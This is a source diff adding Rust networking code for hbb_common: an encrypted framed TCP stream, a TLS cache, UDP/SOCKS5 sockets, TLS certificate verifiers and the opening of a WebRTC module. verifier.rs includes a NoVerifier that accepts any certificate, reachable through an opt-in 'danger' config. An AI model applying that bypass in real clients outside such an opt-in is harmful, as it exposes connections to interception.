+    pub Framed<DynTcpStream, BytesCodec>,
+    pub SocketAddr,
+    pub Option<Encrypt>,
+    pub u64,
+);
+
+impl Deref for FramedStream {
+    type Target = Framed<DynTcpStream, BytesCodec>;
+
+    fn deref(&self) -> &Self::Target {
+        &self.0
+    }
+}
+
+impl DerefMut for FramedStream {
+    fn deref_mut(&mut self) -> &mut Self::Target {
+        &mut self.0
+    }
+}
+
+impl Deref for DynTcpStream {
+    type Target = Box<dyn TcpStreamTrait + Send + Sync>;
+
+    fn deref(&self) -> &Self::Target {
+        &self.0
+    }
+}
+
+impl DerefMut for DynTcpStream {
+    fn deref_mut(&mut self) -> &mut Self::Target {
+        &mut self.0
+    }
+}
+
+pub(crate) fn new_socket(addr: std::net::SocketAddr, reuse: bool) -> Result<TcpSocket, std::io::Error> {
+    let socket = match addr {
+        std::net::SocketAddr::V4(..) => TcpSocket::new_v4()?,
+        std::net::SocketAddr::V6(..) => TcpSocket::new_v6()?,
+    };
+    if reuse {
+        // windows has no reuse_port, but its reuse_address
+        // almost equals to unix's reuse_port + reuse_address,
+        // though may introduce nondeterministic behavior
+        // illumos has no support for SO_REUSEPORT
+        #[cfg(all(unix, not(target_os = "illumos")))]
+        socket.set_reuseport(true).ok();
+        socket.set_reuseaddr(true).ok();
+    }
+    socket.bind(addr)?;
+    Ok(socket)
+}
+
+impl FramedStream {
+    pub async fn new<T: ToSocketAddrs + std::fmt::Display>(
+        remote_addr: T,
+        local_addr: Option<SocketAddr>,
+        ms_timeout: u64,
+    ) -> ResultType<Self> {
+        for remote_addr in lookup_host(&remote_addr).await? {
+            let local = if let Some(addr) = local_addr {
+                addr
+            } else {
+                crate::config::Config::get_any_listen_addr(remote_addr.is_ipv4())
+            };
+            if let Ok(socket) = new_socket(local, true) {
+                if let Ok(Ok(stream)) =
+                    super::timeout(ms_timeout, socket.connect(remote_addr)).await
+                {
+                    stream.set_nodelay(true).ok();
+                    let addr = stream.local_addr()?;
+                    return Ok(Self(
+                        Framed::new(DynTcpStream(Box::new(stream)), BytesCodec::new()),
+                        addr,
+                        None,
+                        0,
+                    ));
+                }
+            }
+        }
+        bail!(format!("Failed to connect to {remote_addr}"));
+    }
+
+    pub async fn connect<'t, T>(
+        target: T,
+        local_addr: Option<SocketAddr>,
+        proxy_conf: &Socks5Server,
+        ms_timeout: u64,
+    ) -> ResultType<Self>
+    where
+        T: IntoTargetAddr<'t>,
+    {
+        let proxy = Proxy::from_conf(proxy_conf, Some(ms_timeout))?;
+        proxy.connect::<T>(target, local_addr).await
+    }
+
+    pub fn local_addr(&self) -> SocketAddr {
+        self.1
+    }
+
+    pub fn set_send_timeout(&mut self, ms: u64) {
+        self.3 = ms;
+    }
+
+    pub fn from(stream: impl TcpStreamTrait + Send + Sync + 'static, addr: SocketAddr) -> Self {
+        Self(
+            Framed::new(DynTcpStream(Box::new(stream)), BytesCodec::new()),
+            addr,
+            None,
+            0,
+        )
+    }
+
+    pub fn set_raw(&mut self) {
+        self.0.codec_mut().set_raw();
+        self.2 = None;
+    }
+
+    pub fn is_secured(&self) -> bool {
+        self.2.is_some()
+    }
+
+    #[inline]
+    pub async fn send(&mut self, msg: &impl Message) -> ResultType<()> {
+        self.send_raw(msg.write_to_bytes()?).await
+    }
+
+    #[inline]
+    pub async fn send_raw(&mut self, msg: Vec<u8>) -> ResultType<()> {
+        let mut msg = msg;
+        if let Some(key) = self.2.as_mut() {
+            msg = key.enc(&msg);
+        }
+        self.send_bytes(bytes::Bytes::from(msg)).await?;
+        Ok(())
+    }
+
+    #[inline]
+    pub async fn send_bytes(&mut self, bytes: Bytes) -> ResultType<()> {
+        if self.3 > 0 {
+            super::timeout(self.3, self.0.send(bytes)).await??;
+        } else {
+            self.0.send(bytes).await?;
+        }
+        Ok(())
+    }
+
+    #[inline]
+    pub async fn next(&mut self) -> Option<Result<BytesMut, Error>> {
+        let mut res = self.0.next().await;
+        if let Some(Ok(bytes)) = res.as_mut() {
+            if let Some(key) = self.2.as_mut() {
+                if let Err(err) = key.dec(bytes) {
+                    return Some(Err(err));
+                }
+            }
+        }
+        res
+    }
+
+    #[inline]
+    pub async fn next_timeout(&mut self, ms: u64) -> Option<Result<BytesMut, Error>> {
+        if let Ok(res) = super::timeout(ms, self.next()).await {
+            res
+        } else {
+            None
+        }
+    }
+
+    pub fn set_key(&mut self, key: Key) {
+        self.2 = Some(Encrypt::new(key));
+    }
+
+    fn get_nonce(seqnum: u64) -> Nonce {
+        let mut nonce = Nonce([0u8; secretbox::NONCEBYTES]);
+        nonce.0[..std::mem::size_of_val(&seqnum)].copy_from_slice(&seqnum.to_le_bytes());
+        nonce
+    }
+}
+
+const DEFAULT_BACKLOG: u32 = 128;
+
+pub async fn new_listener<T: ToSocketAddrs>(addr: T, reuse: bool) -> ResultType<TcpListener> {
+    if !reuse {
+        Ok(TcpListener::bind(addr).await?)
+    } else {
+        let addr = lookup_host(&addr)
+            .await?
+            .next()
+            .context("could not resolve to any address")?;
+        new_socket(addr, true)?
+            .listen(DEFAULT_BACKLOG)
+            .map_err(anyhow::Error::msg)
+    }
+}
+
+pub async fn listen_any(port: u16) -> ResultType<TcpListener> {
+    if let Ok(mut socket) = TcpSocket::new_v6() {
+        #[cfg(unix)]
+        {
+            // illumos has no support for SO_REUSEPORT
+            #[cfg(not(target_os = "illumos"))]
+            socket.set_reuseport(true).ok();
+            socket.set_reuseaddr(true).ok();
+            use std::os::unix::io::{FromRawFd, IntoRawFd};
+            let raw_fd = socket.into_raw_fd();
+            let sock2 = unsafe { socket2::Socket::from_raw_fd(raw_fd) };
+            sock2.set_only_v6(false).ok();
+            socket = unsafe { TcpSocket::from_raw_fd(sock2.into_raw_fd()) };
+        }
+        #[cfg(windows)]
+        {
+            use std::os::windows::prelude::{FromRawSocket, IntoRawSocket};
+            let raw_socket = socket.into_raw_socket();
+            let sock2 = unsafe { socket2::Socket::from_raw_socket(raw_socket) };
+            sock2.set_only_v6(false).ok();
+            socket = unsafe { TcpSocket::from_raw_socket(sock2.into_raw_socket()) };
+        }
+        if socket
+            .bind(SocketAddr::new(IpAddr::V6(Ipv6Addr::UNSPECIFIED), port))
+            .is_ok()
+        {
+            if let Ok(l) = socket.listen(DEFAULT_BACKLOG) {
+                return Ok(l);
+            }
+        }
+    }
+    Ok(new_socket(
+        SocketAddr::new(IpAddr::V4(Ipv4Addr::UNSPECIFIED), port),
+        true,
+    )?
+    .listen(DEFAULT_BACKLOG)?)
+}
+
+impl Unpin for DynTcpStream {}
+
+impl AsyncRead for DynTcpStream {
+    fn poll_read(
+        mut self: Pin<&mut Self>,
+        cx: &mut Context<'_>,
+        buf: &mut ReadBuf<'_>,
+    ) -> Poll<io::Result<()>> {
+        AsyncRead::poll_read(Pin::new(&mut self.0), cx, buf)
+    }
+}
+
+impl AsyncWrite for DynTcpStream {
+    fn poll_write(
+        mut self: Pin<&mut Self>,
+        cx: &mut Context<'_>,
+        buf: &[u8],
+    ) -> Poll<io::Result<usize>> {
+        AsyncWrite::poll_write(Pin::new(&mut self.0), cx, buf)
+    }
+
+    fn poll_flush(mut self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<io::Result<()>> {
+        AsyncWrite::poll_flush(Pin::new(&mut self.0), cx)
+    }
+
+    fn poll_shutdown(mut self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<io::Result<()>> {
+        AsyncWrite::poll_shutdown(Pin::new(&mut self.0), cx)
+    }
+}
+
+impl<R: AsyncRead + AsyncWrite + Unpin> TcpStreamTrait for R {}
+
+impl Encrypt {
+    pub fn new(key: Key) -> Self {
+        Self(key, 0, 0)
+    }
+
+    pub fn dec(&mut self, bytes: &mut BytesMut) -> Result<(), Error> {
+        if bytes.len() <= 1 {
+            return Ok(());
+        }
+        self.2 += 1;
+        let nonce = FramedStream::get_nonce(self.2);
+        match secretbox::open(bytes, &nonce, &self.0) {
+            Ok(res) => {
+                bytes.clear();
+                bytes.put_slice(&res);
+                Ok(())
+            }
+            Err(()) => Err(Error::new(ErrorKind::Other, "decryption error")),
+        }
+    }
+
+    pub fn enc(&mut self, data: &[u8]) -> Vec<u8> {
+        self.1 += 1;
+        let nonce = FramedStream::get_nonce(self.1);
+        secretbox::seal(&data, &nonce, &self.0)
+    }
+
+    pub fn decode(
+        symmetric_data: &[u8],
+        their_pk_b: &[u8],
+        our_sk_b: &box_::SecretKey,
+    ) -> ResultType<Key> {
+        if their_pk_b.len() != box_::PUBLICKEYBYTES {
+            anyhow::bail!("Handshake failed: pk length {}", their_pk_b.len());
+        }
+        let nonce = box_::Nonce([0u8; box_::NONCEBYTES]);
+        let mut pk_ = [0u8; box_::PUBLICKEYBYTES];
+        pk_[..].copy_from_slice(their_pk_b);
+        let their_pk_b = box_::PublicKey(pk_);
+        let symmetric_key = box_::open(symmetric_data, &nonce, &their_pk_b, &our_sk_b)
+            .map_err(|_| anyhow::anyhow!("Handshake failed: box decryption failure"))?;
+        if symmetric_key.len() != secretbox::KEYBYTES {
+            anyhow::bail!("Handshake failed: invalid secret key length from peer");
+        }
+        let mut key = [0u8; secretbox::KEYBYTES];
+        key[..].copy_from_slice(&symmetric_key);
+        Ok(Key(key))
+    }
+}

--- a/libs/hbb_common/src/tls.rs
+++ b/libs/hbb_common/src/tls.rs
@@ -1,0 +1,121 @@
+use std::{collections::HashMap, sync::RwLock};
+
+use crate::config::allow_insecure_tls_fallback;
+
+#[derive(Debug, Clone, Copy)]
+pub enum TlsType {
+    Plain,
+    NativeTls,
+    Rustls,
+}
+
+lazy_static::lazy_static! {
+    static ref URL_TLS_TYPE: RwLock<HashMap<String, TlsType>> = RwLock::new(HashMap::new());
+    static ref URL_TLS_DANGER_ACCEPT_INVALID_CERTS: RwLock<HashMap<String, bool>> = RwLock::new(HashMap::new());
+}
+
+#[inline]
+pub fn is_plain(url: &str) -> bool {
+    url.starts_with("ws://") || url.starts_with("http://")
+}
+
+// Extract domain from URL.
+// e.g., "https://example.com/path" -> "example.com"
+//       "https://example.com:8080/path" -> "example.com:8080"
+// See the tests for more examples.
+#[inline]
+fn get_domain_and_port_from_url(url: &str) -> &str {
+    // Remove scheme (e.g., http://, https://, ws://, wss://)
+    let scheme_end = url.find("://").map(|pos| pos + 3).unwrap_or(0);
+    let url2 = &url[scheme_end..];
+    // If userinfo is present, domain is after last '@'
+    let after_at = match url2.rfind('@') {
+        Some(pos) => &url2[pos + 1..],
+        None => url2,
+    };
+    // Find the end of domain (before '/' or '?')
+    let domain_end = after_at.find(&['/', '?'][..]).unwrap_or(after_at.len());
+    &after_at[..domain_end]
+}
+
+#[inline]
+pub fn upsert_tls_cache(url: &str, tls_type: TlsType, danger_accept_invalid_cert: bool) {
+    if is_plain(url) {
+        return;
+    }
+
+    let domain_port = get_domain_and_port_from_url(url);
+    // Use curly braces to ensure the lock is released immediately.
+    {
+        URL_TLS_TYPE
+            .write()
+            .unwrap()
+            .insert(domain_port.to_string(), tls_type);
+    }
+    {
+        URL_TLS_DANGER_ACCEPT_INVALID_CERTS
+            .write()
+            .unwrap()
+            .insert(domain_port.to_string(), danger_accept_invalid_cert);
+    }
+}
+
+#[inline]
+pub fn reset_tls_cache() {
+    // Use curly braces to ensure the lock is released immediately.
+    {
+        URL_TLS_TYPE.write().unwrap().clear();
+    }
+    {
+        URL_TLS_DANGER_ACCEPT_INVALID_CERTS.write().unwrap().clear();
+    }
+}
+
+#[inline]
+pub fn get_cached_tls_type(url: &str) -> Option<TlsType> {
+    if is_plain(url) {
+        return Some(TlsType::Plain);
+    }
+    let domain_port = get_domain_and_port_from_url(url);
+    URL_TLS_TYPE.read().unwrap().get(domain_port).cloned()
+}
+
+#[inline]
+pub fn get_cached_tls_accept_invalid_cert(url: &str) -> Option<bool> {
+    if !allow_insecure_tls_fallback() {
+        return Some(false);
+    }
+
+    if is_plain(url) {
+        return Some(false);
+    }
+    let domain_port = get_domain_and_port_from_url(url);
+    URL_TLS_DANGER_ACCEPT_INVALID_CERTS
+        .read()
+        .unwrap()
+        .get(domain_port)
+        .cloned()
+}
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn test_get_domain_and_port_from_url() {
+        for (url, expected_domain_port) in vec![
+            ("http://example.com", "example.com"),
+            ("https://example.com", "example.com"),
+            ("ws://example.com/path", "example.com"),
+            ("wss://example.com:8080/path", "example.com:8080"),
+            ("https://user:pass@example.com", "example.com"),
+            ("https://example.com?query=param", "example.com"),
+            ("https://example.com:8443?query=param", "example.com:8443"),
+            ("ftp://example.com/resource", "example.com"), // ftp scheme
+            ("example.com/path", "example.com"),           // no scheme
+            ("example.com:8080/path", "example.com:8080"),
+        ] {
+            let domain_port = get_domain_and_port_from_url(url);
+            assert_eq!(domain_port, expected_domain_port);
+        }
+    }
+}

--- a/libs/hbb_common/src/udp.rs
+++ b/libs/hbb_common/src/udp.rs
@@ -1,0 +1,171 @@
+use crate::ResultType;
+use anyhow::{anyhow, Context};
+use bytes::{Bytes, BytesMut};
+use futures::{SinkExt, StreamExt};
+use protobuf::Message;
+use socket2::{Domain, Socket, Type};
+use std::net::SocketAddr;
+use tokio::net::{lookup_host, ToSocketAddrs, UdpSocket};
+use tokio_socks::{udp::Socks5UdpFramed, IntoTargetAddr, TargetAddr, ToProxyAddrs};
+use tokio_util::{codec::BytesCodec, udp::UdpFramed};
+
+pub enum FramedSocket {
+    Direct(UdpFramed<BytesCodec>),
+    ProxySocks(Socks5UdpFramed),
+}
+
+fn new_socket(addr: SocketAddr, reuse: bool, buf_size: usize) -> Result<Socket, std::io::Error> {
+    let socket = match addr {
+        SocketAddr::V4(..) => Socket::new(Domain::ipv4(), Type::dgram(), None),
+        SocketAddr::V6(..) => Socket::new(Domain::ipv6(), Type::dgram(), None),
+    }?;
+    if reuse {
+        // windows has no reuse_port, but its reuse_address
+        // almost equals to unix's reuse_port + reuse_address,
+        // though may introduce nondeterministic behavior
+        // illumos has no support for SO_REUSEPORT
+        #[cfg(all(unix, not(target_os = "illumos")))]
+        socket.set_reuse_port(true).ok();
+        socket.set_reuse_address(true).ok();
+    }
+    // only nonblocking work with tokio, https://stackoverflow.com/questions/64649405/receiver-on-tokiompscchannel-only-receives-messages-when-buffer-is-full
+    socket.set_nonblocking(true)?;
+    if buf_size > 0 {
+        socket.set_recv_buffer_size(buf_size).ok();
+    }
+    log::debug!(
+        "Receive buf size of udp {}: {:?}",
+        addr,
+        socket.recv_buffer_size()
+    );
+    if addr.is_ipv6() && addr.ip().is_unspecified() && addr.port() > 0 {
+        socket.set_only_v6(false).ok();
+    }
+    socket.bind(&addr.into())?;
+    Ok(socket)
+}
+
+impl FramedSocket {
+    pub async fn new<T: ToSocketAddrs>(addr: T) -> ResultType<Self> {
+        Self::new_reuse(addr, false, 0).await
+    }
+
+    pub async fn new_reuse<T: ToSocketAddrs>(
+        addr: T,
+        reuse: bool,
+        buf_size: usize,
+    ) -> ResultType<Self> {
+        let addr = lookup_host(&addr)
+            .await?
+            .next()
+            .context("could not resolve to any address")?;
+        Ok(Self::Direct(UdpFramed::new(
+            UdpSocket::from_std(new_socket(addr, reuse, buf_size)?.into_udp_socket())?,
+            BytesCodec::new(),
+        )))
+    }
+
+    pub async fn new_proxy<'a, 't, P: ToProxyAddrs, T: ToSocketAddrs>(
+        proxy: P,
+        local: T,
+        username: &'a str,
+        password: &'a str,
+        ms_timeout: u64,
+    ) -> ResultType<Self> {
+        let framed = if username.trim().is_empty() {
+            super::timeout(ms_timeout, Socks5UdpFramed::connect(proxy, Some(local))).await??
+        } else {
+            super::timeout(
+                ms_timeout,
+                Socks5UdpFramed::connect_with_password(proxy, Some(local), username, password),
+            )
+            .await??
+        };
+        log::trace!(
+            "Socks5 udp connected, local addr: {:?}, target addr: {}",
+            framed.local_addr(),
+            framed.socks_addr()
+        );
+        Ok(Self::ProxySocks(framed))
+    }
+
+    #[inline]
+    pub async fn send(
+        &mut self,
+        msg: &impl Message,
+        addr: impl IntoTargetAddr<'_>,
+    ) -> ResultType<()> {
+        let addr = addr.into_target_addr()?.to_owned();
+        let send_data = Bytes::from(msg.write_to_bytes()?);
+        match self {
+            Self::Direct(f) => {
+                if let TargetAddr::Ip(addr) = addr {
+                    f.send((send_data, addr)).await?
+                }
+            }
+            Self::ProxySocks(f) => f.send((send_data, addr)).await?,
+        };
+        Ok(())
+    }
+
+    // https://stackoverflow.com/a/68733302/1926020
+    #[inline]
+    pub async fn send_raw(
+        &mut self,
+        msg: &'static [u8],
+        addr: impl IntoTargetAddr<'static>,
+    ) -> ResultType<()> {
+        let addr = addr.into_target_addr()?.to_owned();
+
+        match self {
+            Self::Direct(f) => {
+                if let TargetAddr::Ip(addr) = addr {
+                    f.send((Bytes::from(msg), addr)).await?
+                }
+            }
+            Self::ProxySocks(f) => f.send((Bytes::from(msg), addr)).await?,
+        };
+        Ok(())
+    }
+
+    #[inline]
+    pub async fn next(&mut self) -> Option<ResultType<(BytesMut, TargetAddr<'static>)>> {
+        match self {
+            Self::Direct(f) => match f.next().await {
+                Some(Ok((data, addr))) => {
+                    Some(Ok((data, addr.into_target_addr().ok()?.to_owned())))
+                }
+                Some(Err(e)) => Some(Err(anyhow!(e))),
+                None => None,
+            },
+            Self::ProxySocks(f) => match f.next().await {
+                Some(Ok((data, _))) => Some(Ok((data.data, data.dst_addr))),
+                Some(Err(e)) => Some(Err(anyhow!(e))),
+                None => None,
+            },
+        }
+    }
+
+    #[inline]
+    pub async fn next_timeout(
+        &mut self,
+        ms: u64,
+    ) -> Option<ResultType<(BytesMut, TargetAddr<'static>)>> {
+        if let Ok(res) =
+            tokio::time::timeout(std::time::Duration::from_millis(ms), self.next()).await
+        {
+            res
+        } else {
+            None
+        }
+    }
+
+    pub fn local_addr(&self) -> Option<SocketAddr> {
+        if let FramedSocket::Direct(x) = self {
+            if let Ok(v) = x.get_ref().local_addr() {
+                return Some(v);
+            }
+        }
+        None
+    }
+}

--- a/libs/hbb_common/src/verifier.rs
+++ b/libs/hbb_common/src/verifier.rs
@@ -1,0 +1,257 @@
+use crate::ResultType;
+use rustls_pki_types::{ServerName, UnixTime};
+use std::sync::Arc;
+use tokio_rustls::rustls::{self, client::WebPkiServerVerifier, ClientConfig};
+use tokio_rustls::rustls::{
+    client::danger::{HandshakeSignatureValid, ServerCertVerified, ServerCertVerifier},
+    DigitallySignedStruct, Error as TLSError, SignatureScheme,
+};
+
+// https://github.com/seanmonstar/reqwest/blob/fd61bc93e6f936454ce0b978c6f282f06eee9287/src/tls.rs#L608
+#[derive(Debug)]
+pub(crate) struct NoVerifier;
+
+impl ServerCertVerifier for NoVerifier {
+    fn verify_server_cert(
+        &self,
+        _end_entity: &rustls_pki_types::CertificateDer,
+        _intermediates: &[rustls_pki_types::CertificateDer],
+        _server_name: &ServerName,
+        _ocsp_response: &[u8],
+        _now: UnixTime,
+    ) -> Result<ServerCertVerified, TLSError> {
+        Ok(ServerCertVerified::assertion())
+    }
+
+    fn verify_tls12_signature(
+        &self,
+        _message: &[u8],
+        _cert: &rustls_pki_types::CertificateDer,
+        _dss: &DigitallySignedStruct,
+    ) -> Result<HandshakeSignatureValid, TLSError> {
+        Ok(HandshakeSignatureValid::assertion())
+    }
+
+    fn verify_tls13_signature(
+        &self,
+        _message: &[u8],
+        _cert: &rustls_pki_types::CertificateDer,
+        _dss: &DigitallySignedStruct,
+    ) -> Result<HandshakeSignatureValid, TLSError> {
+        Ok(HandshakeSignatureValid::assertion())
+    }
+
+    fn supported_verify_schemes(&self) -> Vec<SignatureScheme> {
+        vec![
+            SignatureScheme::RSA_PKCS1_SHA1,
+            SignatureScheme::ECDSA_SHA1_Legacy,
+            SignatureScheme::RSA_PKCS1_SHA256,
+            SignatureScheme::ECDSA_NISTP256_SHA256,
+            SignatureScheme::RSA_PKCS1_SHA384,
+            SignatureScheme::ECDSA_NISTP384_SHA384,
+            SignatureScheme::RSA_PKCS1_SHA512,
+            SignatureScheme::ECDSA_NISTP521_SHA512,
+            SignatureScheme::RSA_PSS_SHA256,
+            SignatureScheme::RSA_PSS_SHA384,
+            SignatureScheme::RSA_PSS_SHA512,
+            SignatureScheme::ED25519,
+            SignatureScheme::ED448,
+        ]
+    }
+}
+
+/// A certificate verifier that tries a primary verifier first,
+/// and falls back to a platform verifier if the primary fails.
+#[cfg(any(target_os = "android", target_os = "ios"))]
+#[derive(Debug)]
+struct FallbackPlatformVerifier {
+    primary: Arc<dyn ServerCertVerifier>,
+    fallback: Arc<dyn ServerCertVerifier>,
+}
+
+#[cfg(any(target_os = "android", target_os = "ios"))]
+impl FallbackPlatformVerifier {
+    fn with_platform_fallback(
+        primary: Arc<dyn ServerCertVerifier>,
+        provider: Arc<rustls::crypto::CryptoProvider>,
+    ) -> Result<Self, TLSError> {
+        #[cfg(target_os = "android")]
+        if !crate::config::ANDROID_RUSTLS_PLATFORM_VERIFIER_INITIALIZED
+            .load(std::sync::atomic::Ordering::Relaxed)
+        {
+            return Err(TLSError::General(
+                "rustls-platform-verifier not initialized".to_string(),
+            ));
+        }
+        let fallback = Arc::new(rustls_platform_verifier::Verifier::new(provider)?);
+        Ok(Self { primary, fallback })
+    }
+}
+
+#[cfg(any(target_os = "android", target_os = "ios"))]
+impl ServerCertVerifier for FallbackPlatformVerifier {
+    fn verify_server_cert(
+        &self,
+        end_entity: &rustls_pki_types::CertificateDer<'_>,
+        intermediates: &[rustls_pki_types::CertificateDer<'_>],
+        server_name: &ServerName<'_>,
+        ocsp_response: &[u8],
+        now: UnixTime,
+    ) -> Result<ServerCertVerified, TLSError> {
+        match self.primary.verify_server_cert(
+            end_entity,
+            intermediates,
+            server_name,
+            ocsp_response,
+            now,
+        ) {
+            Ok(verified) => Ok(verified),
+            Err(primary_err) => {
+                match self.fallback.verify_server_cert(
+                    end_entity,
+                    intermediates,
+                    server_name,
+                    ocsp_response,
+                    now,
+                ) {
+                    Ok(verified) => Ok(verified),
+                    Err(fallback_err) => {
+                        log::error!(
+                            "Both primary and fallback verifiers failed to verify server certificate, primary error: {:?}, fallback error: {:?}",
+                            primary_err,
+                            fallback_err
+                        );
+                        Err(primary_err)
+                    }
+                }
+            }
+        }
+    }
+
+    fn verify_tls12_signature(
+        &self,
+        message: &[u8],
+        cert: &rustls_pki_types::CertificateDer<'_>,
+        dss: &DigitallySignedStruct,
+    ) -> Result<HandshakeSignatureValid, TLSError> {
+        // Both WebPkiServerVerifier and rustls_platform_verifier use the same signature verification implementation.
+        // https://github.com/rustls/rustls/blob/1ee126adb3352a2dcd72420dcd6040351a6ddc1e/rustls/src/webpki/server_verifier.rs#L278
+        // https://github.com/rustls/rustls/blob/1ee126adb3352a2dcd72420dcd6040351a6ddc1e/rustls/src/crypto/mod.rs#L17
+        // https://github.com/rustls/rustls-platform-verifier/blob/1099f161bfc5e3ac7f90aad88b1bf788e72906cb/rustls-platform-verifier/src/verification/android.rs#L9
+        // https://github.com/rustls/rustls-platform-verifier/blob/1099f161bfc5e3ac7f90aad88b1bf788e72906cb/rustls-platform-verifier/src/verification/apple.rs#L6
+        self.primary.verify_tls12_signature(message, cert, dss)
+    }
+
+    fn verify_tls13_signature(
+        &self,
+        message: &[u8],
+        cert: &rustls_pki_types::CertificateDer<'_>,
+        dss: &DigitallySignedStruct,
+    ) -> Result<HandshakeSignatureValid, TLSError> {
+        // Same implementation as verify_tls12_signature.
+        self.primary.verify_tls13_signature(message, cert, dss)
+    }
+
+    fn supported_verify_schemes(&self) -> Vec<SignatureScheme> {
+        // Both WebPkiServerVerifier and rustls_platform_verifier use the same crypto provider,
+        // so their supported signature schemes are identical.
+        // https://github.com/rustls/rustls/blob/1ee126adb3352a2dcd72420dcd6040351a6ddc1e/rustls/src/webpki/server_verifier.rs#L172C52-L172C85
+        // https://github.com/rustls/rustls-platform-verifier/blob/1099f161bfc5e3ac7f90aad88b1bf788e72906cb/rustls-platform-verifier/src/verification/android.rs#L327
+        // https://github.com/rustls/rustls-platform-verifier/blob/1099f161bfc5e3ac7f90aad88b1bf788e72906cb/rustls-platform-verifier/src/verification/apple.rs#L304
+        self.primary.supported_verify_schemes()
+    }
+}
+
+fn webpki_server_verifier(
+    provider: Arc<rustls::crypto::CryptoProvider>,
+) -> ResultType<Arc<WebPkiServerVerifier>> {
+    // Load root certificates from both bundled webpki_roots and system-native certificate stores.
+    // This approach is consistent with how reqwest and tokio-tungstenite handle root certificates.
+    // https://github.com/snapview/tokio-tungstenite/blob/35d110c24c9d030d1608ec964d70c789dfb27452/src/tls.rs#L95
+    // https://github.com/seanmonstar/reqwest/blob/b126ca49da7897e5d676639cdbf67a0f6838b586/src/async_impl/client.rs#L643
+    let mut root_cert_store = rustls::RootCertStore::empty();
+    root_cert_store.extend(webpki_roots::TLS_SERVER_ROOTS.iter().cloned());
+    let rustls_native_certs::CertificateResult { certs, errors, .. } =
+        rustls_native_certs::load_native_certs();
+    if !errors.is_empty() {
+        log::warn!("native root CA certificate loading errors: {errors:?}");
+    }
+    root_cert_store.add_parsable_certificates(certs);
+
+    // Build verifier using with_root_certificates behavior (WebPkiServerVerifier without CRLs).
+    // Both reqwest and tokio-tungstenite use this approach.
+    // https://github.com/seanmonstar/reqwest/blob/b126ca49da7897e5d676639cdbf67a0f6838b586/src/async_impl/client.rs#L749
+    // https://github.com/snapview/tokio-tungstenite/blob/35d110c24c9d030d1608ec964d70c789dfb27452/src/tls.rs#L127
+    // https://github.com/rustls/rustls/blob/1ee126adb3352a2dcd72420dcd6040351a6ddc1e/rustls/src/client/builder.rs#L47
+    // with_root_certificates creates a WebPkiServerVerifier without revocation checking:
+    // https://github.com/rustls/rustls/blob/1ee126adb3352a2dcd72420dcd6040351a6ddc1e/rustls/src/webpki/server_verifier.rs#L177
+    // https://github.com/rustls/rustls/blob/1ee126adb3352a2dcd72420dcd6040351a6ddc1e/rustls/src/webpki/server_verifier.rs#L168
+    // Since no CRL is provided (as is the case here), we must explicitly set allow_unknown_revocation_status()
+    // to match the behavior of with_root_certificates, which allows unknown revocation status by default.
+    // https://github.com/rustls/rustls/blob/1ee126adb3352a2dcd72420dcd6040351a6ddc1e/rustls/src/webpki/server_verifier.rs#L37
+    // Note: build() only returns an error if the root certificate store is empty, which won't happen here.
+    let verifier = rustls::client::WebPkiServerVerifier::builder_with_provider(
+        Arc::new(root_cert_store),
+        provider.clone(),
+    )
+    .allow_unknown_revocation_status()
+    .build()
+    .map_err(|e| anyhow::anyhow!(e))?;
+    Ok(verifier)
+}
+
+pub fn client_config(danger_accept_invalid_cert: bool) -> ResultType<ClientConfig> {
+    if danger_accept_invalid_cert {
+        client_config_danger()
+    } else {
+        client_config_safe()
+    }
+}
+
+pub fn client_config_safe() -> ResultType<ClientConfig> {
+    // Use the default builder which uses the default protocol versions and crypto provider.
+    // The with_protocol_versions API has been removed in rustls master branch:
+    // https://github.com/rustls/rustls/pull/2599
+    // This approach is consistent with tokio-tungstenite's usage:
+    // https://github.com/snapview/tokio-tungstenite/blob/35d110c24c9d030d1608ec964d70c789dfb27452/src/tls.rs#L126
+    let config_builder = rustls::ClientConfig::builder();
+    let provider = config_builder.crypto_provider().clone();
+    let webpki_verifier = webpki_server_verifier(provider.clone())?;
+    #[cfg(any(target_os = "android", target_os = "ios"))]
+    {
+        match FallbackPlatformVerifier::with_platform_fallback(webpki_verifier.clone(), provider) {
+            Ok(fallback_verifier) => {
+                let config = config_builder
+                    .dangerous()
+                    .with_custom_certificate_verifier(Arc::new(fallback_verifier))
+                    .with_no_client_auth();
+                Ok(config)
+            }
+            Err(e) => {
+                log::error!(
+                    "Failed to create fallback verifier: {:?}, use webpki verifier instead",
+                    e
+                );
+                let config = config_builder
+                    .with_webpki_verifier(webpki_verifier)
+                    .with_no_client_auth();
+                Ok(config)
+            }
+        }
+    }
+    #[cfg(not(any(target_os = "android", target_os = "ios")))]
+    {
+        let config = config_builder
+            .with_webpki_verifier(webpki_verifier)
+            .with_no_client_auth();
+        Ok(config)
+    }
+}
+
+pub fn client_config_danger() -> ResultType<ClientConfig> {
+    let config = ClientConfig::builder()
+        .dangerous()
+        .with_custom_certificate_verifier(Arc::new(NoVerifier))
+        .with_no_client_auth();
+    Ok(config)
+}

--- a/libs/hbb_common/src/webrtc.rs
+++ b/libs/hbb_common/src/webrtc.rs
@@ -1,0 +1,770 @@
+use std::collections::HashMap;
+use std::io::{Error, ErrorKind};
+use std::net::{IpAddr, Ipv4Addr, SocketAddr};
+use std::sync::Arc;
+use std::time::Duration;
+
+use webrtc::api::setting_engine::SettingEngine;
+use webrtc::api::APIBuilder;
+use webrtc::data_channel::RTCDataChannel;
+use webrtc::ice::mdns::MulticastDnsMode;
+use webrtc::ice_transport::ice_server::RTCIceServer;
+use webrtc::peer_connection::configuration::RTCConfiguration;
+use webrtc::peer_connection::peer_connection_state::RTCPeerConnectionState;
+use webrtc::peer_connection::policy::ice_transport_policy::RTCIceTransportPolicy;
+use webrtc::peer_connection::sdp::session_description::RTCSessionDescription;
+use webrtc::peer_connection::RTCPeerConnection;
+
+use base64::engine::general_purpose::STANDARD as BASE64_STANDARD;
+use base64::Engine;
+use bytes::{Bytes, BytesMut};
+use tokio::sync::watch;
+use tokio::sync::Mutex;
+use tokio::time::timeout;
+use url::Url;
+
+use crate::config;
+use crate::protobuf::Message;
+use crate::sodiumoxide::crypto::secretbox::Key;
+use crate::ResultType;
+
+pub struct WebRTCStream {
+    pc: Arc<RTCPeerConnection>,
+    stream: Arc<Mutex<Arc<RTCDataChannel>>>,
+    state_notify: watch::Receiver<bool>,
+    send_timeout: u64,
+}
+
+/// Standard maximum message size for WebRTC data channels (RFC 8831, 65535 bytes).
+/// Most browsers, including Chromium, enforce this protocol limit.
